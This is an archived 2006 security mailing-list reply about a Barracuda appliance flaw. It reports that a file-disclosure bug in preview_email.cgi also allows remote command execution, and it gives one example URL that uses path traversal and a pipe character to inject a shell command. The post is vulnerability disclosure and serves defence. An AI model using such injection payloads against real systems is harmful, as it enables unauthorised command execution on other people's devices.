|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02]
From: Matthew Hall (lists
ecsc.co.uk)
Date: Thu Aug 03 2006 - 11:01:01 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
gssinclannlsoftware.com wrote:
> Title: Barracuda Arbitrary File Disclosure
This vulnerability doesn't just allow arbitrary file disclosure, but
also allows remote execution of commands through use of the pipe
characher (|), e.g:
https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/|
Regards,
Matt
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]